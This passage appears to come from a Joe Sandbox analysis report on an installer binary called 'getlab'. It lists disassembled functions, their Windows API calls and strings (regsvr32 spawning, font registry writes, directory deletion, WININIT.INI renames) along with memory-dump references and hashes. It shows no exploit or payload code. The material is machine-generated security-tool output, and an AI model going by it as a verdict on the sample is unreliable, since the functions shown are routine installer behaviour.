                                                                          • String ID: /s "$ /u$0x%x$CreateProcess$D$Spawning 32-bit RegSvr32: $Spawning 64-bit RegSvr32: $regsvr32.exe"
                                                                          • API String ID: 2051275411-1862435767
                                                                          • Opcode ID: cb06b037a9936da38b1ea299305d673950aed566f5e97164fe1c7bb630972389
                                                                          • Instruction ID: 56a02eb2220928eb4cb829bb83c6f501b915172eb664170f25c545f5d36e4a23
                                                                          • Opcode Fuzzy Hash: cb06b037a9936da38b1ea299305d673950aed566f5e97164fe1c7bb630972389
                                                                          • Instruction Fuzzy Hash: 80413670A003086BDB10EFE5D842B8EB7B9AF44705F50407FA904BB297DF789A0D8B19
                                                                          Function 0044D170 Relevance: 13.6, APIs: 9, Instructions: 90COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • OffsetRect.USER32(?,00000001,00000001), ref: 0044D1A1
                                                                          • GetSysColor.USER32(00000014), ref: 0044D1A8
                                                                          • SetTextColor.GDI32(00000000,00000000), ref: 0044D1C0
                                                                          • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D1E9
                                                                          • OffsetRect.USER32(?,000000FF,000000FF), ref: 0044D1F3
                                                                          • GetSysColor.USER32(00000010), ref: 0044D1FA
                                                                          • SetTextColor.GDI32(00000000,00000000), ref: 0044D212
                                                                          • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D23B
                                                                          • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D266
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Text$Color$Draw$OffsetRect
                                                                          • String ID:
                                                                          • API String ID: 1005981011-0
                                                                          • Opcode ID: c5a987219403fb39552b8629345f90501b93a362f94b22de4e5dcdb6506d09d4
                                                                          • Instruction ID: 3fa3981ec5684e07db84b004592342e93505d63b705e9416633fcf0049301179
                                                                          • Opcode Fuzzy Hash: c5a987219403fb39552b8629345f90501b93a362f94b22de4e5dcdb6506d09d4
                                                                          • Instruction Fuzzy Hash: 6A21CEB46415047FC710FB2ACC8AE8BBBECDF19319B00457AB958EB392C678DE404668
                                                                          Function 00495A00 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 90sleepsynchronizationthreadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00450900: SetEndOfFile.KERNEL32(?,?,0045C162,00000000,0045C2ED,?,00000000,00000002,00000002), ref: 00450907
                                                                            • Part of subcall function 00406F40: DeleteFileA.KERNEL32(00000000,0049B628,00497BFD,00000000,00497C52,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F4B
                                                                          • GetWindowThreadProcessId.USER32(00000000,?), ref: 00495A91
                                                                          • OpenProcess.KERNEL32(00100000,00000000,?,00000000,?), ref: 00495AA5
                                                                          • SendNotifyMessageA.USER32(00000000,0000054D,00000000,00000000), ref: 00495ABF
                                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,0000054D,00000000,00000000,00000000,?), ref: 00495ACB
                                                                          • CloseHandle.KERNEL32(00000000,00000000,000000FF,00000000,0000054D,00000000,00000000,00000000,?), ref: 00495AD1
                                                                          • Sleep.KERNEL32(000001F4,00000000,0000054D,00000000,00000000,00000000,?), ref: 00495AE4
                                                                          Strings
                                                                          • Deleting Uninstall data files., xrefs: 00495A07
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: FileProcess$CloseDeleteHandleMessageNotifyObjectOpenSendSingleSleepThreadWaitWindow
                                                                          • String ID: Deleting Uninstall data files.
                                                                          • API String ID: 1570157960-2568741658
                                                                          • Opcode ID: 181e5138e971e41075a5f0d412266dd8d351837d1b4a26c408709cd589ae8453
                                                                          • Instruction ID: 8fd25edfc014547dd13852670f785c7791f766ba0082412c3ee421c8584d85d8
                                                                          • Opcode Fuzzy Hash: 181e5138e971e41075a5f0d412266dd8d351837d1b4a26c408709cd589ae8453
                                                                          • Instruction Fuzzy Hash: 6D217371304610AFEB11E7A6ECC6B2736A8E758328F61453BB5019A1E2D67CAC04CB6C
                                                                          Function 0047001C Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 89registrywindowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 0042DE14: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0048319F,?,00000001,?,?,0048319F,?,00000001,00000000), ref: 0042DE30
                                                                          • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,00470119,?,?,?,?,00000000), ref: 00470083
                                                                          • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,00470119), ref: 0047009A
                                                                          • AddFontResourceA.GDI32(00000000), ref: 004700B7
                                                                          • SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 004700CB
                                                                          Strings
                                                                          • Failed to set value in Fonts registry key., xrefs: 0047008C
                                                                          • Failed to open Fonts registry key., xrefs: 004700A1
                                                                          • AddFontResource, xrefs: 004700D5
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: CloseFontMessageNotifyOpenResourceSendValue
                                                                          • String ID: AddFontResource$Failed to open Fonts registry key.$Failed to set value in Fonts registry key.
                                                                          • API String ID: 955540645-649663873
                                                                          • Opcode ID: f5f332fdf6b81b93aa7c4aa8247d012b23b36d83bd75883ed92b8e0c843fb9c6
                                                                          • Instruction ID: 9e1cacd5bb0885738b58fd2773111f6953d7784f445270ce1bd520dac8ad2ca8
                                                                          • Opcode Fuzzy Hash: f5f332fdf6b81b93aa7c4aa8247d012b23b36d83bd75883ed92b8e0c843fb9c6
                                                                          • Instruction Fuzzy Hash: 2921B270741240BBDB10EA669C42FAA77DDCB54708F508437B904EB3C2DA7DAE02966D
                                                                          Function 00462C58 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 75windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00416408: GetClassInfoA.USER32(00400000,?,?), ref: 00416477
                                                                            • Part of subcall function 00416408: UnregisterClassA.USER32(?,00400000), ref: 004164A3
                                                                            • Part of subcall function 00416408: RegisterClassA.USER32(?), ref: 004164C6
                                                                          • GetVersion.KERNEL32 ref: 00462C88
                                                                          • SendMessageA.USER32(00000000,0000112C,00000004,00000004), ref: 00462CC6
                                                                          • SHGetFileInfo.SHELL32(00462D64,00000000,?,00000160,00004011), ref: 00462CE3
                                                                          • LoadCursorA.USER32(00000000,00007F02), ref: 00462D01
                                                                          • SetCursor.USER32(00000000,00000000,00007F02,00462D64,00000000,?,00000160,00004011), ref: 00462D07
                                                                          • SetCursor.USER32(?,00462D47,00007F02,00462D64,00000000,?,00000160,00004011), ref: 00462D3A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: ClassCursor$Info$FileLoadMessageRegisterSendUnregisterVersion
                                                                          • String ID: Explorer
                                                                          • API String ID: 2594429197-512347832
                                                                          • Opcode ID: 30df62a617669fef841725f59b7241a6ef7ae2a9f6b946bb27ea1461a0e7011c
                                                                          • Instruction ID: fc1c968538dd14d686f90bdc81855b9701391525be241791f09fb78c6da7bbf1
                                                                          • Opcode Fuzzy Hash: 30df62a617669fef841725f59b7241a6ef7ae2a9f6b946bb27ea1461a0e7011c
                                                                          • Instruction Fuzzy Hash: 7A21E7717407047AE720BB768D47F9A3698DB09708F40047FBA09EF2D3D9BC880186AD
                                                                          Function 00477E04 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 66libraryfileloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,GetFinalPathNameByHandleA,02152BD0,?,?,?,02152BD0,00477FC8,00000000,004780E6,?,?,-00000010,?), ref: 00477E1D
                                                                          • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00477E23
                                                                          • GetFileAttributesA.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02152BD0,?,?,?,02152BD0,00477FC8,00000000,004780E6,?,?,-00000010,?), ref: 00477E36
                                                                          • CreateFileA.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02152BD0,?,?,?,02152BD0), ref: 00477E60
                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,02152BD0,00477FC8,00000000,004780E6,?,?,-00000010,?), ref: 00477E7E
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: FileHandle$AddressAttributesCloseCreateModuleProc
                                                                          • String ID: GetFinalPathNameByHandleA$kernel32.dll
                                                                          • API String ID: 2704155762-2318956294
                                                                          • Opcode ID: 174de6e33fe68a4e6b56811a15987559e55e5d15ecccd51d737e8050849857cd
                                                                          • Instruction ID: a9b895bb6ebf06323b616d37e9582929c99452ce9f0730db43ffa1519c083574
                                                                          • Opcode Fuzzy Hash: 174de6e33fe68a4e6b56811a15987559e55e5d15ecccd51d737e8050849857cd
                                                                          • Instruction Fuzzy Hash: D1014551788B0436E52031BA0C82FBB244C8F50729F508177BB5CEE2D3EABC9C0201AE
                                                                          Function 00401A90 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 59COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • RtlEnterCriticalSection.KERNEL32(0049B420,00000000,00401B68), ref: 00401ABD
                                                                          • LocalFree.KERNEL32(005927C8,00000000,00401B68), ref: 00401ACF
                                                                          • VirtualFree.KERNEL32(?,00000000,00008000,005927C8,00000000,00401B68), ref: 00401AEE
                                                                          • LocalFree.KERNEL32(005937C8,?,00000000,00008000,005927C8,00000000,00401B68), ref: 00401B2D
                                                                          • RtlLeaveCriticalSection.KERNEL32(0049B420,00401B6F), ref: 00401B58
                                                                          • RtlDeleteCriticalSection.KERNEL32(0049B420,00401B6F), ref: 00401B62
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                          • String ID: =Y
                                                                          • API String ID: 3782394904-2624468338
                                                                          • Opcode ID: ef0d8b2142be7cf42810e170793bf0a6b8446fdea194a224c38922696d0a74e0
                                                                          • Instruction ID: 79795942c165c44483fb09e1962e32eaca51f8de38df00e9c029d8aa05623ce8
                                                                          • Opcode Fuzzy Hash: ef0d8b2142be7cf42810e170793bf0a6b8446fdea194a224c38922696d0a74e0
                                                                          • Instruction Fuzzy Hash: 3B118E30A003405AEB15AB65BE85B263BA5D761B08F44407BF80067BF3D77C5850E7AE
                                                                          Function 00459C2C Relevance: 12.1, APIs: 1, Strings: 7, Instructions: 121COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetLastError.KERNEL32(00000000,00459DAE,?,00000000,00000000,00000000,?,00000006,?,00000000,00496D69,?,00000000,00496E0C), ref: 00459CF2
                                                                            • Part of subcall function 004543C8: FindClose.KERNEL32(000000FF,004544BE), ref: 004544AD
                                                                          Strings
                                                                          • Not stripping read-only attribute because the directory does not appear to be empty., xrefs: 00459CCC
                                                                          • Failed to strip read-only attribute., xrefs: 00459CC0
                                                                          • Failed to delete directory (%d). Will delete on restart (if empty)., xrefs: 00459D67
                                                                          • Stripped read-only attribute., xrefs: 00459CB4
                                                                          • Failed to delete directory (%d). Will retry later., xrefs: 00459D0B
                                                                          • Deleting directory: %s, xrefs: 00459C7B
                                                                          • Failed to delete directory (%d)., xrefs: 00459D88
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: CloseErrorFindLast
                                                                          • String ID: Deleting directory: %s$Failed to delete directory (%d).$Failed to delete directory (%d). Will delete on restart (if empty).$Failed to delete directory (%d). Will retry later.$Failed to strip read-only attribute.$Not stripping read-only attribute because the directory does not appear to be empty.$Stripped read-only attribute.
                                                                          • API String ID: 754982922-1448842058
                                                                          • Opcode ID: 98c166b47c72afa297f55e861990155f618f32ac3a66bf902307907fb8e99ae8
                                                                          • Instruction ID: cce1cab1201e8728e9bc38508445727295e1911ffe2e7292dd45cd7f335e186b
                                                                          • Opcode Fuzzy Hash: 98c166b47c72afa297f55e861990155f618f32ac3a66bf902307907fb8e99ae8
                                                                          • Instruction Fuzzy Hash: F9418230A04259DACB04EB6988013AE76F55F4930AF55857FAC0597393D7BC8E0D879A
                                                                          Function 00422E48 Relevance: 12.1, APIs: 8, Instructions: 119windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetCapture.USER32 ref: 00422E9C
                                                                          • GetCapture.USER32 ref: 00422EAB
                                                                          • SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 00422EB1
                                                                          • ReleaseCapture.USER32 ref: 00422EB6
                                                                          • GetActiveWindow.USER32 ref: 00422EC5
                                                                          • SendMessageA.USER32(00000000,0000B000,00000000,00000000), ref: 00422F44
                                                                          • SendMessageA.USER32(00000000,0000B001,00000000,00000000), ref: 00422FA8
                                                                          • GetActiveWindow.USER32 ref: 00422FB7
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: CaptureMessageSend$ActiveWindow$Release
                                                                          • String ID:
                                                                          • API String ID: 862346643-0
                                                                          • Opcode ID: b9008f70cee70ce8cdbe9feae850e28bfa4c4446851c9a93175be9357b8d3b25
                                                                          • Instruction ID: a831bf89ec3617aa4b81e8a61b28cb02c358a8e939ae68eb352e359643dafe13
                                                                          • Opcode Fuzzy Hash: b9008f70cee70ce8cdbe9feae850e28bfa4c4446851c9a93175be9357b8d3b25
                                                                          • Instruction Fuzzy Hash: E1414070B00245AFDB10EF69DA46B9E77F1EF48304F5140BAF404AB2A2D7B89E40DB59
                                                                          Function 0042F288 Relevance: 12.1, APIs: 8, Instructions: 102windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetWindowLongA.USER32(?,000000F0), ref: 0042F2B2
                                                                          • GetWindowLongA.USER32(?,000000EC), ref: 0042F2C9
                                                                          • GetActiveWindow.USER32 ref: 0042F2D2
                                                                          • MessageBoxA.USER32(00000000,00000000,00000000,00000000), ref: 0042F2FF
                                                                          • SetActiveWindow.USER32(?,0042F42F,00000000,?), ref: 0042F320
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Window$ActiveLong$Message
                                                                          • String ID:
                                                                          • API String ID: 2785966331-0
                                                                          • Opcode ID: a223125d65db3de814fb2ac44b456330cdbbeb03ed1e631204e072d19995624a
                                                                          • Instruction ID: 9696dc9395d24dec9abacdc10881687288e082ae8fcf9a6a48756090996bfad8
                                                                          • Opcode Fuzzy Hash: a223125d65db3de814fb2ac44b456330cdbbeb03ed1e631204e072d19995624a
                                                                          • Instruction Fuzzy Hash: A431A171A00714AFDB01EFB9DC52E6E7BF8EB09714B9148BAF804E7291D7389D10CA58
                                                                          Function 00429478 Relevance: 12.1, APIs: 8, Instructions: 62COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • 73A1A570.USER32(00000000), ref: 00429482
                                                                          • GetTextMetricsA.GDI32(00000000), ref: 0042948B
                                                                            • Part of subcall function 0041A1E0: CreateFontIndirectA.GDI32(?), ref: 0041A29F
                                                                          • SelectObject.GDI32(00000000,00000000), ref: 0042949A
                                                                          • GetTextMetricsA.GDI32(00000000,?), ref: 004294A7
                                                                          • SelectObject.GDI32(00000000,00000000), ref: 004294AE
                                                                          • 73A1A480.USER32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 004294B6
                                                                          • GetSystemMetrics.USER32(00000006), ref: 004294DB
                                                                          • GetSystemMetrics.USER32(00000006), ref: 004294F5
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Metrics$ObjectSelectSystemText$A480A570CreateFontIndirect
                                                                          • String ID:
                                                                          • API String ID: 361401722-0
                                                                          • Opcode ID: 9352f0de83d2aa8ef3dc5e588d401a22e63a3fe7846e7c3b2a64ff92932535c4
                                                                          • Instruction ID: 79023d5d76270fc5b80a90959683f08304bbfc9b3a68a0d1de019d9dda53e89a
                                                                          • Opcode Fuzzy Hash: 9352f0de83d2aa8ef3dc5e588d401a22e63a3fe7846e7c3b2a64ff92932535c4
                                                                          • Instruction Fuzzy Hash: FE01C0A17087503BE311767A9CC6F6F65C8DB44358F84043BF686D63D3D9AC9C81876A
                                                                          Function 0041DE1C Relevance: 12.1, APIs: 8, Instructions: 60windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • 73A1A570.USER32(00000000,?,00419051,004980EA), ref: 0041DE1F
                                                                          • 73A24620.GDI32(00000000,0000005A,00000000,?,00419051,004980EA), ref: 0041DE29
                                                                          • 73A1A480.USER32(00000000,00000000,00000000,0000005A,00000000,?,00419051,004980EA), ref: 0041DE36
                                                                          • MulDiv.KERNEL32(00000008,00000060,00000048), ref: 0041DE45
                                                                          • GetStockObject.GDI32(00000007), ref: 0041DE53
                                                                          • GetStockObject.GDI32(00000005), ref: 0041DE5F
                                                                          • GetStockObject.GDI32(0000000D), ref: 0041DE6B
                                                                          • LoadIconA.USER32(00000000,00007F00), ref: 0041DE7C
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: ObjectStock$A24620A480A570IconLoad
                                                                          • String ID:
                                                                          • API String ID: 3573811560-0
                                                                          • Opcode ID: 710d086b1de04f4d575db38747d659360b557b0cb5838dc09f26a38d22fa0d7e
                                                                          • Instruction ID: 462cd7651d9f59a3c1518f9422d26db27efab3bc10fcb75ee14264e6343fb545
                                                                          • Opcode Fuzzy Hash: 710d086b1de04f4d575db38747d659360b557b0cb5838dc09f26a38d22fa0d7e
                                                                          • Instruction Fuzzy Hash: 0E11EC706456055AE340FFAA6A52BAA3695E724708F00813FF6099F3D1D77D2C444B9F
                                                                          Function 00463068 Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 273COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LoadCursorA.USER32(00000000,00007F02), ref: 0046316C
                                                                          • SetCursor.USER32(00000000,00000000,00007F02,00000000,00463201), ref: 00463172
                                                                          • SetCursor.USER32(?,004631E9,00007F02,00000000,00463201), ref: 004631DC
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Cursor$Load
                                                                          • String ID: $ $Internal error: Item already expanding
                                                                          • API String ID: 1675784387-1948079669
                                                                          • Opcode ID: 18a8c92a23110e1585e61799d78ad50682638d437455fe8a8eac84c2222b077b
                                                                          • Instruction ID: 8c03ff8e54c482a295deb11cd31210a84b03b27930917a3eb50de1af6f5dfb0a
                                                                          • Opcode Fuzzy Hash: 18a8c92a23110e1585e61799d78ad50682638d437455fe8a8eac84c2222b077b
                                                                          • Instruction Fuzzy Hash: A7B1C430A00284DFD711DF69C589B9ABBF1FF04305F1484AAE8459B792EB78EE45CB19
                                                                          Function 00453D04 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 225COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00453DEB
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: PrivateProfileStringWrite
                                                                          • String ID: .tmp$MoveFileEx$NUL$WININIT.INI$[rename]
                                                                          • API String ID: 390214022-3304407042
